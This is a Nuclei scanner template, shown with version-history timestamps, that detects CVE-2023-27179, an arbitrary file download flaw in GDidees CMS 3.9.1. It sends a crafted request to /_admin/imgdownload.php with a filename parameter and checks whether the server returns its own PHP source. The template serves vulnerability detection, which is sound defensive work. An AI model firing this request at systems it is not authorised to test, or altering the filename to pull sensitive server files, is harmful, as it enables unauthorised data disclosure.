nuclei-templates/http/cves/2023/CVE-2023-27179.yaml

51 lines
1.5 KiB
YAML
Raw Normal View History

2023-04-21 08:56:01 +00:00
id: CVE-2023-27179
info:
name: GDidees CMS v3.9.1 - Arbitrary File Download
author: theamanrawat
2023-07-11 19:49:27 +00:00
severity: high
2023-04-21 08:56:01 +00:00
description: |
GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.
reference:
- https://www.gdidees.eu/cms-1-0.html
- https://gist.github.com/Hadi999/516aa25b953b0cba57089a0c11b1305b
- https://nvd.nist.gov/vuln/detail/CVE-2023-27179
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/171894/GDidees-CMS-3.9.1-Local-File-Disclosure-Directory-Traversal.html
- https://knowledge-base.secureflag.com/vulnerabilities/unrestricted_file_download/unrestricted_file_download_vulnerability.html
2023-04-21 08:56:01 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2023-04-21 08:56:01 +00:00
cve-id: CVE-2023-27179
2023-07-11 19:49:27 +00:00
cwe-id: CWE-434
epss-score: 0.02894
cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:*
2023-04-21 08:56:01 +00:00
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: gdidees
product: gdidees_cms
2023-04-21 08:56:01 +00:00
tags: cve,cve2023,file-download,gdidees,lfr
http:
2023-04-21 08:56:01 +00:00
- method: GET
path:
- "{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '$filename=$_GET["filename"];'
- '@readfile($filename) OR die();'
condition: and
- type: word
part: header
words:
- 'application/force-download'
- type: status
status:
- 200